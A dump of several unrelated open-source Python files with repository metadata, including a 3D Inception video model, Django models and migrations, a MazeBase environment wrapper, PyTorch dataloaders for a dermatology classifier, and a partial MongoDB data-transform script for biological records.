x = MaxPooling3D((1, 3, 3), strides=(1, 2, 2), padding='same', name='MaxPool2d_3a_3x3')(x)
# Mixed 3b
branch_0 = conv3d_bn(x, 64, 1, 1, 1, padding='same', name='Conv3d_3b_0a_1x1')
branch_1 = conv3d_bn(x, 96, 1, 1, 1, padding='same', name='Conv3d_3b_1a_1x1')
branch_1 = conv3d_bn(branch_1, 128, 3, 3, 3, padding='same', name='Conv3d_3b_1b_3x3')
branch_2 = conv3d_bn(x, 16, 1, 1, 1, padding='same', name='Conv3d_3b_2a_1x1')
branch_2 = conv3d_bn(branch_2, 32, 3, 3, 3, padding='same', name='Conv3d_3b_2b_3x3')
branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_3b_3a_3x3')(x)
branch_3 = conv3d_bn(branch_3, 32, 1, 1, 1, padding='same', name='Conv3d_3b_3b_1x1')
x = layers.concatenate(
[branch_0, branch_1, branch_2, branch_3],
axis=channel_axis,
name='Mixed_3b')
# Mixed 3c
branch_0 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_3c_0a_1x1')
branch_1 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_3c_1a_1x1')
branch_1 = conv3d_bn(branch_1, 192, 3, 3, 3, padding='same', name='Conv3d_3c_1b_3x3')
branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_3c_2a_1x1')
branch_2 = conv3d_bn(branch_2, 96, 3, 3, 3, padding='same', name='Conv3d_3c_2b_3x3')
branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_3c_3a_3x3')(x)
branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_3c_3b_1x1')
x = layers.concatenate(
[branch_0, branch_1, branch_2, branch_3],
axis=channel_axis,
name='Mixed_3c')
# Downsampling (spatial and temporal)
x = MaxPooling3D((3, 3, 3), strides=(2, 2, 2), padding='same', name='MaxPool2d_4a_3x3')(x)
# Mixed 4b
branch_0 = conv3d_bn(x, 192, 1, 1, 1, padding='same', name='Conv3d_4b_0a_1x1')
branch_1 = conv3d_bn(x, 96, 1, 1, 1, padding='same', name='Conv3d_4b_1a_1x1')
branch_1 = conv3d_bn(branch_1, 208, 3, 3, 3, padding='same', name='Conv3d_4b_1b_3x3')
branch_2 = conv3d_bn(x, 16, 1, 1, 1, padding='same', name='Conv3d_4b_2a_1x1')
branch_2 = conv3d_bn(branch_2, 48, 3, 3, 3, padding='same', name='Conv3d_4b_2b_3x3')
branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4b_3a_3x3')(x)
branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4b_3b_1x1')
x = layers.concatenate(
[branch_0, branch_1, branch_2, branch_3],
axis=channel_axis,
name='Mixed_4b')
# Mixed 4c
branch_0 = conv3d_bn(x, 160, 1, 1, 1, padding='same', name='Conv3d_4c_0a_1x1')
branch_1 = conv3d_bn(x, 112, 1, 1, 1, padding='same', name='Conv3d_4c_1a_1x1')
branch_1 = conv3d_bn(branch_1, 224, 3, 3, 3, padding='same', name='Conv3d_4c_1b_3x3')
branch_2 = conv3d_bn(x, 24, 1, 1, 1, padding='same', name='Conv3d_4c_2a_1x1')
branch_2 = conv3d_bn(branch_2, 64, 3, 3, 3, padding='same', name='Conv3d_4c_2b_3x3')
branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4c_3a_3x3')(x)
branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4c_3b_1x1')
x = layers.concatenate(
[branch_0, branch_1, branch_2, branch_3],
axis=channel_axis,
name='Mixed_4c')
# Mixed 4d
branch_0 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_4d_0a_1x1')
branch_1 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_4d_1a_1x1')
branch_1 = conv3d_bn(branch_1, 256, 3, 3, 3, padding='same', name='Conv3d_4d_1b_3x3')
branch_2 = conv3d_bn(x, 24, 1, 1, 1, padding='same', name='Conv3d_4d_2a_1x1')
branch_2 = conv3d_bn(branch_2, 64, 3, 3, 3, padding='same', name='Conv3d_4d_2b_3x3')
branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4d_3a_3x3')(x)
branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4d_3b_1x1')
x = layers.concatenate(
[branch_0, branch_1, branch_2, branch_3],
axis=channel_axis,
name='Mixed_4d')
# Mixed 4e
branch_0 = conv3d_bn(x, 112, 1, 1, 1, padding='same', name='Conv3d_4e_0a_1x1')
branch_1 = conv3d_bn(x, 144, 1, 1, 1, padding='same', name='Conv3d_4e_1a_1x1')
branch_1 = conv3d_bn(branch_1, 288, 3, 3, 3, padding='same', name='Conv3d_4e_1b_3x3')
branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_4e_2a_1x1')
branch_2 = conv3d_bn(branch_2, 64, 3, 3, 3, padding='same', name='Conv3d_4e_2b_3x3')
branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4e_3a_3x3')(x)
branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4e_3b_1x1')
x = layers.concatenate(
[branch_0, branch_1, branch_2, branch_3],
axis=channel_axis,
name='Mixed_4e')
# Mixed 4f
branch_0 = conv3d_bn(x, 256, 1, 1, 1, padding='same', name='Conv3d_4f_0a_1x1')
branch_1 = conv3d_bn(x, 160, 1, 1, 1, padding='same', name='Conv3d_4f_1a_1x1')
branch_1 = conv3d_bn(branch_1, 320, 3, 3, 3, padding='same', name='Conv3d_4f_1b_3x3')
branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_4f_2a_1x1')
branch_2 = conv3d_bn(branch_2, 128, 3, 3, 3, padding='same', name='Conv3d_4f_2b_3x3')
branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4f_3a_3x3')(x)
branch_3 = conv3d_bn(branch_3, 128, 1, 1, 1, padding='same', name='Conv3d_4f_3b_1x1')
x = layers.concatenate(
[branch_0, branch_1, branch_2, branch_3],
axis=channel_axis,
name='Mixed_4f')
# Downsampling (spatial and temporal)
x = MaxPooling3D((2, 2, 2), strides=(2, 2, 2), padding='same', name='MaxPool2d_5a_2x2')(x)
# Mixed 5b
branch_0 = conv3d_bn(x, 256, 1, 1, 1, padding='same', name='Conv3d_5b_0a_1x1')
branch_1 = conv3d_bn(x, 160, 1, 1, 1, padding='same', name='Conv3d_5b_1a_1x1')
branch_1 = conv3d_bn(branch_1, 320, 3, 3, 3, padding='same', name='Conv3d_5b_1b_3x3')
branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_5b_2a_1x1')
branch_2 = conv3d_bn(branch_2, 128, 3, 3, 3, padding='same', name='Conv3d_5b_2b_3x3')
branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_5b_3a_3x3')(x)
branch_3 = conv3d_bn(branch_3, 128, 1, 1, 1, padding='same', name='Conv3d_5b_3b_1x1')
x = layers.concatenate(
[branch_0, branch_1, branch_2, branch_3],
axis=channel_axis,
name='Mixed_5b')
# Mixed 5c
branch_0 = conv3d_bn(x, 384, 1, 1, 1, padding='same', name='Conv3d_5c_0a_1x1')
branch_1 = conv3d_bn(x, 192, 1, 1, 1, padding='same', name='Conv3d_5c_1a_1x1')
branch_1 = conv3d_bn(branch_1, 384, 3, 3, 3, padding='same', name='Conv3d_5c_1b_3x3')
branch_2 = conv3d_bn(x, 48, 1, 1, 1, padding='same', name='Conv3d_5c_2a_1x1')
branch_2 = conv3d_bn(branch_2, 128, 3, 3, 3, padding='same', name='Conv3d_5c_2b_3x3')
branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_5c_3a_3x3')(x)
branch_3 = conv3d_bn(branch_3, 128, 1, 1, 1, padding='same', name='Conv3d_5c_3b_1x1')
x = layers.concatenate(
[branch_0, branch_1, branch_2, branch_3],
axis=channel_axis,
name='Mixed_5c')
if include_top:
# Classification block
x = AveragePooling3D((2, 7, 7), strides=(1, 1, 1), padding='valid', name='global_avg_pool')(x)
x = Dropout(dropout_prob)(x)
x = conv3d_bn(x, classes, 1, 1, 1, padding='same',
use_bias=True, use_activation_fn=False, use_bn=False, name='Conv3d_6a_1x1')
num_frames_remaining = int(x.shape[1])
x = Reshape((num_frames_remaining, classes))(x)
# logits (raw scores for each class)
x = Lambda(lambda x: K.mean(x, axis=1, keepdims=False),
output_shape=lambda s: (s[0], s[2]))(x)
if not endpoint_logit:
x = Activation('softmax', name='prediction')(x)
else:
h = int(x.shape[2])
w = int(x.shape[3])
x = AveragePooling3D((2, h, w), strides=(1, 1, 1), padding='valid', name='global_avg_pool')(x)
inputs = img_input
# create model
model = Model(inputs, x, name='i3d_inception')
# load weights
if include_top:
weights_url = WEIGHTS_PATH['flow_imagenet_and_kinetics']
model_name = 'i3d_inception_flow_imagenet_and_kinetics.h5'
else:
weights_url = WEIGHTS_PATH_NO_TOP['flow_imagenet_and_kinetics']
model_name = 'i3d_inception_flow_imagenet_and_kinetics_no_top.h5'
downloaded_weights_path = get_file(model_name, weights_url, cache_subdir='models')
model.load_weights(downloaded_weights_path)
return model
if "_name_" == "_main_":
keI3DOflow = Inception_Inflated3d(include_top=False, weights='flow_imagenet_and_kinetics',
input_shape=(40, 224, 224, 2))
| 39.179894 | 184 | 0.648616 |
2e146bccb657a276022a0ea42ce7a5a35fe4cf2b | 763 | py | Python | zdgen/backend/listing/generator.py | fprimex/zdgen | f351e979cf719e526450fb00ba27689455dbf736 | [
"MIT"
] | 2 | 2019-11-30T20:26:44.000Z | 2021-07-24T04:05:47.000Z | zdgen/backend/listing/generator.py | fprimex/zdgen | f351e979cf719e526450fb00ba27689455dbf736 | [
"MIT"
] | null | null | null | zdgen/backend/listing/generator.py | fprimex/zdgen | f351e979cf719e526450fb00ba27689455dbf736 | [
"MIT"
] | null | null | null | import itertools
def _sanitize(q):
return q.replace('[', '_').replace(']', '')
def generate(api_items, duplicate_api_items, dupe_info):
content = ''
# sort api_items by path alphabetically
for name in sorted(list(api_items.keys()),
key=lambda i: api_items[i]['path']):
item = api_items[name]
query = '&'.join('{0}=<arg>'.format(q) for q in item['query_params'])
if query:
query = '?' + query
# We expect to have a method but it is not guaranteed
if item['method'] is None:
method = 'MULTIPLE'
else:
method = item['method']
content += '{:<8} {}{}\n'.format(method, item['path'], query)
return ('listing.txt', content)
| 24.612903 | 77 | 0.550459 |
3a9bdd79c86faad0101c574aab8c9b6eb4bae8a2 | 472 | py | Python | apps/jobs/migrations/0011_Change_submission_visibility_default_to_public.py | geekayush/EvalAI | 3b6e3c20c9a9f08da84426566a8bfe0753e46782 | [
"BSD-3-Clause"
] | 3 | 2019-02-24T10:57:09.000Z | 2019-02-24T16:49:32.000Z | apps/jobs/migrations/0011_Change_submission_visibility_default_to_public.py | geekayush/EvalAI | 3b6e3c20c9a9f08da84426566a8bfe0753e46782 | [
"BSD-3-Clause"
] | 2 | 2019-02-09T04:51:10.000Z | 2019-02-09T04:51:23.000Z | apps/jobs/migrations/0011_Change_submission_visibility_default_to_public.py | geekayush/EvalAI | 3b6e3c20c9a9f08da84426566a8bfe0753e46782 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-01-21 19:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0010_Add_blank_in_submission_metadata'),
]
operations = [
migrations.AlterField(
model_name='submission',
name='is_public',
field=models.BooleanField(default=True),
),
]
| 22.47619 | 58 | 0.633475 |
3a971dfb374cdd8a6678ad80cdcce45ae05992f1 | 2,618 | py | Python | app/core/models.py | jhgutsol1290/recipe-app-api | 1c2ca015a05b0309f80b074e4df08e5180a1cbe7 | [
"MIT"
] | null | null | null | app/core/models.py | jhgutsol1290/recipe-app-api | 1c2ca015a05b0309f80b074e4df08e5180a1cbe7 | [
"MIT"
] | null | null | null | app/core/models.py | jhgutsol1290/recipe-app-api | 1c2ca015a05b0309f80b074e4df08e5180a1cbe7 | [
"MIT"
] | null | null | null | import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
"""Generate file path for new recipe image"""
ext = filename.split('.')[-1]
filename = f'{uuid.uuid4()}.{ext}'
return os.path.join('uploads/recipe/', filename)
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
"""Creates and saves a new user"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates ans saves a new super user"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that supports using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
class Tag(models.Model):
"""Tag to be used for a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Ingredient(models.Model):
"""Ingredient to be used in a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
image = models.ImageField(null=True, upload_to=recipe_image_file_path)
def __str__(self):
return self.title
| 28.769231 | 76 | 0.672269 |
ca92bbb69c8ba17d47b2d85ad88906b0c03f21d8 | 3,392 | py | Python | SelfPlay/environment/mazebase_wrapper.py | denisergashbaev/memory-augmented-self-play | 7a916d5b7b622713465d570e810356ac72e8a74c | [
"MIT"
] | 48 | 2018-05-29T03:13:22.000Z | 2021-12-10T03:26:12.000Z | SelfPlay/environment/mazebase_wrapper.py | denisergashbaev/memory-augmented-self-play | 7a916d5b7b622713465d570e810356ac72e8a74c | [
"MIT"
] | 1 | 2018-07-20T15:11:46.000Z | 2018-07-20T22:50:33.000Z | SelfPlay/environment/mazebase_wrapper.py | denisergashbaev/memory-augmented-self-play | 7a916d5b7b622713465d570e810356ac72e8a74c | [
"MIT"
] | 7 | 2018-05-30T00:57:57.000Z | 2021-09-29T17:21:24.000Z | import random
from copy import deepcopy
import mazebase
# These weird import statements are taken from https://github.com/facebook/MazeBase/blob/23454fe092ecf35a8aab4da4972f231c6458209b/py/example.py#L12
import mazebase.games as mazebase_games
import numpy as np
from mazebase.games import curriculum
from mazebase.games import featurizers
from environment.env import Environment
from environment.observation import Observation
from utils.constant import *
class MazebaseWrapper(Environment):
"""
Wrapper class over maze base environment
"""
def __init__(self):
super(MazebaseWrapper, self).__init__()
self.name = MAZEBASE
try:
# Reference: https://github.com/facebook/MazeBase/blob/3e505455cae6e4ec442541363ef701f084aa1a3b/py/mazebase/games/mazegame.py#L454
small_size = (10, 10, 10, 10)
lk = curriculum.CurriculumWrappedGame(
mazebase_games.LightKey,
curriculums={
'map_size': mazebase_games.curriculum.MapSizeCurriculum(
small_size,
small_size,
(10, 10, 10, 10)
)
}
)
game = mazebase_games.MazeGame(
games=[lk],
featurizer=mazebase_games.featurizers.GridFeaturizer()
)
except mazebase.utils.mazeutils.MazeException as e:
print(e)
self.game = game
self.actions = self.game.all_possible_actions()
def observe(self):
game_observation = self.game.observe()
# Logic borrowed from:
# https://github.com/facebook/MazeBase/blob/23454fe092ecf35a8aab4da4972f231c6458209b/py/example.py#L192
obs, info = game_observation[OBSERVATION]
featurizers.grid_one_hot(self.game, obs)
obs = np.array(obs)
featurizers.vocabify(self.game, info)
info = np.array(obs)
game_observation[OBSERVATION] = np.concatenate((obs, info), 2).flatten()
is_episode_over = self.game.is_over()
return Observation(id=game_observation[ID],
reward=game_observation[REWARD],
state=game_observation[OBSERVATION],
is_episode_over=is_episode_over)
def reset(self):
try:
self.game.reset()
except Exception as e:
print(e)
return self.observe()
def display(self):
return self.game.display()
def is_over(self):
return self.game.is_over()
def act(self, action):
self.game.act(action=action)
return self.observe()
def all_possible_actions(self):
return self.actions
def set_seed(self, seed):
# Not needed here as we already set the numpy seed
pass
def create_copy(self):
return deepcopy(self.game.game)
def load_copy(self, env_copy):
self.game.game = env_copy
def are_states_equal(self, state_1, state_2):
return np.array_equal(state_1, state_2)
if __name__ == "__main__":
env = MazebaseWrapper()
env.display()
actions = env.all_possible_actions()
print(actions)
for i in range(10):
print("==============")
_action = random.choice(actions)
print(_action)
env.act(_action)
env.display()
| 30.836364 | 147 | 0.61763 |
f2726b3fa23251d76804d1a812ef90e4d7fde1dc | 1,130 | py | Python | testing/wsgi.py | theY4Kman/django-jinja | 03e05b6689582a0af4b82d93f188ecbcb7a85f23 | [
"BSD-3-Clause"
] | 210 | 2015-05-21T16:54:05.000Z | 2022-01-06T01:24:52.000Z | testing/wsgi.py | theY4Kman/django-jinja | 03e05b6689582a0af4b82d93f188ecbcb7a85f23 | [
"BSD-3-Clause"
] | 139 | 2015-05-15T11:01:03.000Z | 2022-03-29T21:13:04.000Z | testing/wsgi.py | theY4Kman/django-jinja | 03e05b6689582a0af4b82d93f188ecbcb7a85f23 | [
"BSD-3-Clause"
] | 84 | 2015-05-15T09:35:22.000Z | 2021-09-03T13:14:44.000Z | """
WSGI config for arandomtable project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| 43.461538 | 79 | 0.809735 |
07d15e5aa69e4f332786bdfe7264f9e99cc432cc | 3,593 | py | Python | dataloaders.py | hannesroth88/dermatologist-ai | 9b0222a88ca3f3c59bd2d6acd460fc42767c3dfb | [
"MIT"
] | null | null | null | dataloaders.py | hannesroth88/dermatologist-ai | 9b0222a88ca3f3c59bd2d6acd460fc42767c3dfb | [
"MIT"
] | 3 | 2021-06-08T21:05:26.000Z | 2022-01-13T02:23:20.000Z | dataloaders.py | hannesroth88/dermatologist-ai | 9b0222a88ca3f3c59bd2d6acd460fc42767c3dfb | [
"MIT"
] | null | null | null | import torch
from torchvision import datasets
import torchvision.transforms as transforms
from torch.utils.data.sampler import SubsetRandomSampler
# Set PIL to be tolerant of image files that are truncated.
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
from config import Config as config
class DataLoaders(object):
def createDataloaders(self, config):
print('')
print('####################')
print('Create Dataloaders')
print('####################')
# see https://github.com/pytorch/examples/blob/42e5b996718797e45c46a25c55b031e6768f8440/imagenet/main.py#L89-L101
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
# load and transform data using ImageFolder
data_transforms = {
'train': transforms.Compose([
transforms.Resize(256),
transforms.RandomResizedCrop(224, scale=(0.08, 1), ratio=(1, 1)),
# transforms.RandomRotation(15),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
]),
'valid': transforms.Compose([
transforms.Resize(224),
transforms.CenterCrop(224), # because of size missmatch
transforms.ToTensor(),
normalize
]),
'test': transforms.Compose([
transforms.Resize(224),
transforms.CenterCrop(224), # because of size missmatch
transforms.ToTensor(),
normalize
]),
}
# image_datasets = {x: datasets.ImageFolder(config.dirs[x], transform=data_transforms[x])
# for x in ['train', 'valid', 'test']}
image_datasets = {x: ImageFolderWithPaths(root=config.dirs[x], transform=data_transforms[x])
for x in ['train', 'valid', 'test']}
# prepare data loaders
loaders = {
x: torch.utils.data.DataLoader(image_datasets[x], batch_size=config.batch_size,
num_workers=config.num_workers,
shuffle=True)
for x in ['train', 'valid', 'test']}
dataset_sizes = {x: len(image_datasets[x])
for x in ['train', 'valid', 'test']}
loaders['test1by1'] = torch.utils.data.DataLoader(image_datasets['test'], batch_size=1,
num_workers=config.num_workers,
shuffle=True)
class_names = image_datasets['train'].classes
# print out some data stats
print('Num of Images: ' + str(dataset_sizes))
print('Num of classes: ', len(class_names), ' -> ', class_names)
return loaders, dataset_sizes, class_names
class ImageFolderWithPaths(datasets.ImageFolder):
"""Custom dataset that includes image file paths. Extends
torchvision.datasets.ImageFolder
"""
# override the __getitem__ method. this is the method that dataloader calls
def __getitem__(self, index):
# this is what ImageFolder normally returns
original_tuple = super(ImageFolderWithPaths, self).__getitem__(index)
# the image file path
path = self.imgs[index][0]
# make a new tuple that includes original and the path
tuple_with_path = (original_tuple + (path,))
return tuple_with_path
| 42.270588 | 121 | 0.569441 |
dc90d0d75024d784a9bfd9653dd52db8d0469f0b | 24,235 | py | Python | datanator/schema_2/transform.py | KarrLab/Kinetic-Datanator | 8aff047fd117033b98eca8ee3b21a8f07c430dec | [
"CC-BY-3.0",
"CC0-1.0",
"CC-BY-4.0",
"MIT"
] | 10 | 2018-11-20T17:04:09.000Z | 2021-08-24T18:29:06.000Z | datanator/schema_2/transform.py | KarrLab/Kinetic-Datanator | 8aff047fd117033b98eca8ee3b21a8f07c430dec | [
"CC-BY-3.0",
"CC0-1.0",
"CC-BY-4.0",
"MIT"
] | 59 | 2018-11-23T20:42:11.000Z | 2020-11-08T19:51:36.000Z | datanator/schema_2/transform.py | KarrLab/Kinetic-Datanator | 8aff047fd117033b98eca8ee3b21a8f07c430dec | [
"CC-BY-3.0",
"CC0-1.0",
"CC-BY-4.0",
"MIT"
] | 3 | 2018-12-15T00:53:54.000Z | 2021-08-24T18:29:08.000Z | from datanator_query_python.util import mongo_util
from datanator_query_python.config import config
import copy
import numpy as np
import re
class Transform(mongo_util.MongoUtil):
def __init__(self,
MongoDB=None,
db=None,
des_col=None,
username=None,
password=None,
max_entries=float('inf'),
verbose=True):
super().__init__(MongoDB=MongoDB,
db=db,
username=username,
password=password)
self.max_entries = max_entries
self.col = des_col
self.db = db
self.verbose = verbose
def process_docs(self,
col,
db="datanator-test",
skip=0):
"""Processing documents and transform.
Args:
col(:obj:`str`): Name of the source collection.
db(:obj:`Obj`): Name of database.
"""
query = {}
projection = {"_id": 0}
docs = self.client[db][col].find(filter=query, projection=projection)
for i, doc in enumerate(docs):
if i == self.max_entries:
break
if i % 20 == 0 and self.verbose:
print("Processing doc {}".format(i))
if col == "uniprot":
entity = self.build_uniprot_entity(doc)
obs = self.build_uniprot_observation(doc)
self.update_entity(entity,
entity["identifiers"][0],
db=self.db)
if obs != {}:
self.update_observation(obs,
obs["source"][0])
elif col == "rna_halflife_new":
obs = self.build_rna_observation(doc)
for ob in obs:
_filter = {"$and": [{"identifier": ob["identifier"]},
{"source": {"$elemMatch": ob["source"][0]}},
{"environment": ob["environment"]}]}
self.update_observation(ob,
ob["source"][0],
db=self.db,
query=_filter)
elif col == "rna_modification":
if doc.get("amino_acid") is None:
continue
entity = self.build_rna_modification_entity(doc)
obs = self.build_rna_modification_observation(doc)
self.update_entity(entity,
entity["identifiers"][0])
for ob in obs:
query = {"$and": [{"identifier": ob["identifier"]},
{"genotype.taxon.ncbi_taxonomy_id": ob["genotype"]["taxon"]["ncbi_taxonomy_id"]}]}
self.update_observation(ob,
ob["source"][0],
query=query)
def build_uniprot_entity(self, obj):
"""Build entity from uniprot collection.
Args:
(:obj:`Obj`): object from which entity object will be built.
Return:
(:obj:`Obj`): entity object.
"""
_type = "protein"
identifiers = []
related = []
genotype = {}
name = obj.get("protein_name")
identifiers.append({"namespace": "uniprot_id",
"value": obj.get("uniprot_id")})
for o in obj.get("add_id"):
identifiers.append({"namespace": o.get("name_space"),
"value": o.get("value")})
canon_ancestors = []
for _id, name in zip(obj.get("canon_anc_ids"), obj.get("canon_anc_names")):
canon_ancestors.append({"ncbi_taxonomy_id": _id,
"name": name})
genotype["taxon"] = {"ncbi_taxonomy_id": obj.get("ncbi_taxonomy_id"),
"obj": obj.get("species_name"),
"canon_ancestors": canon_ancestors}
structures = [{"format": "canonical_sequence",
"value": obj.get("canonical_sequence")}]
mod = self.client["datanator-test"]["protein_modifications"].find({"uniprot_id": obj.get("uniprot_id")})
if mod is not None:
for o in mod:
if o.get("concrete") and np.isnan(o.get("monomeric_form_issues")) and np.isnan(o.get("pro_issues")):
identifiers.append({"namespace": "pro_id",
"value": o.get("pro_id")})
structures.append({"format": "processed_sequence_iubmb",
"value": o.get("processed_sequence_iubmb"),
"molecular_weight": o.get("processed_molecular_weight"),
"charge": o.get("processed_charge"),
"formula": o.get("processed_formula"),
"source": [{"namespace": "pro_id",
"value": o.get("pro_id"),
"level": "secondary"},
{"namespace": "doi",
"value": o.get("reference")["doi"],
"level": "primary"}]})
structures.append({"format": "modified_sequence_abbreviated_bpforms",
"value": o.get("modified_sequence_abbreviated_bpforms"),
"molecular_weight": o.get("modified_molecular_weight"),
"charge": o.get("modified_charge"),
"formula": o.get("modified_formula"),
"modification": {
"description": o.get("modifications"),
"formula": o.get("modifications_formula"),
"weight": o.get("modifications_molecular_weight"),
"charge": o.get("modifications_charge")
},
"source": [{"namespace": "pro_id",
"value": o.get("pro_id"),
"level": "secondary"},
{"namespace": "doi",
"value": o.get("reference")["doi"],
"level": "primary"}]})
structures.append({"format": "modified_sequence_bpforms",
"value": o.get("modified_sequence_bpforms")})
related.append({"namespace": "ec",
"value": obj.get("ec_number")})
identifiers.append({"namespace": "entrez_id",
"value": obj.get("entrez_id")})
identifiers.append({"namespace": "entry_name",
"value": obj.get("entry_name")})
related.append({"namespace": "gene_name",
"value": obj.get("gene_name")})
for n in obj.get("ko_name"):
related.append({"namespace": "ko_name",
"value": n})
related.append({"namespace": "ko_number",
"value": obj.get("ko_number")})
return {"type": _type,
"name": name,
"synonyms": [],
"identifiers": identifiers,
"related": related,
"genotype": genotype,
"structures": structures,
"schema_version": "2.0"}
def build_uniprot_observation(self, obj):
"""Build observation from uniprot collection.
Args:
(:obj:`Obj`): object from which observation object will be built.
Return:
(:obj:`Obj`): observation object.
"""
abundances = obj.get("abundances", [])
schema_version = "2.0"
result = {}
if len(abundances) == 0:
return result
else:
values = []
for a in abundances:
values.append({"type": "protein_abundance",
"value": a.get("abundance"),
"units": "ppm",
"organ": a.get("organ")})
entity = {"type": "protein",
"name": obj.get("protein_name"),
"identifiers": [{"namespace": "uniprot_id",
"value": obj.get("uniprot_id")}],
"schema_version": schema_version}
return {"entity": entity,
"values": values,
"source": [{"namespace": "paxdb",
"value": obj.get("uniprot_id")}],
"identifier": {"namespace": "uniprot_id",
"value": obj.get("uniprot_id")},
"schema_version": schema_version}
def build_rna_observation(self, obj):
"""Build RNA observation object from rna_haflife_new collection.
Args:
obj(:obj:`Obj`): object to be transformed.
Return:
(:obj:`list` of :obj:`Obj`)
"""
result = []
pattern = r"^gm[\d]+"
schema_version = "2.0"
for life in obj.get("halflives"):
entity = {"schema_version": schema_version}
value = {"type": "rna_halflife"}
environment = {}
genotype = {}
source = []
related = []
related.append({"namespace": "uniprot_id",
"value": obj.get("uniprot_id")})
related.append({"namespace": "kegg_orthology_id",
"value": obj.get("ko_number")})
entity["type"] = "RNA"
entity["name"] = obj.get("protein_names")[0]
entity["identifiers"] = [{"namespace": "uniprot_id",
"value": obj.get("uniprot_id")}]
values = []
if life.get("transcript_size") is not None:
entity["structures"] = []
if life.get("values") is None:
for key, val in life.items():
if key == "unit":
value["units"] = val
elif key == "halflife":
value["value"] = float(val)
elif key == "ncbi_taxonomy_id": # protein entity includes taxon info
continue
elif key == "species_name":
continue
elif key == "reference":
for ref in val:
source.append({"namespace": list(ref.keys())[0],
"value": list(ref.values())[0]})
elif key == "gene_name":
related.append({"namespace": key,
"value": val})
elif key == "gene_symbol":
related.append({"namespace": key,
"value": val})
elif key == "systematic_name":
entity["identifiers"].append({"namespace": key,
"value": val})
elif key == "accession_id":
if isinstance(val, str):
entity["identifiers"].append({"namespace": key,
"value": val})
elif isinstance(val, list):
for _id in val:
entity["identifiers"].append({"namespace": key,
"value": _id})
elif key == "variation_coefficient":
value["uncertainty"] = float(val)
elif key == "growth_medium":
environment["media"] = val
elif key == "ordered_locus_name":
entity["identifiers"].append({"namespace": key,
"value": val})
elif key == "doubling_time":
environment[key] = val
elif key == "r_squared":
value["uncertainty"] = float(val)
elif key == "standard_error":
value["uncertainty"] = float(val)
elif key == "transcript_size":
entity["structures"].append({"format": key,
"value": str(val)})
elif key == "cds_size":
entity["structures"].append({"format": key,
"value": str(val)})
elif key == "intron_size":
entity["structures"].append({"format": key,
"value": str(val)})
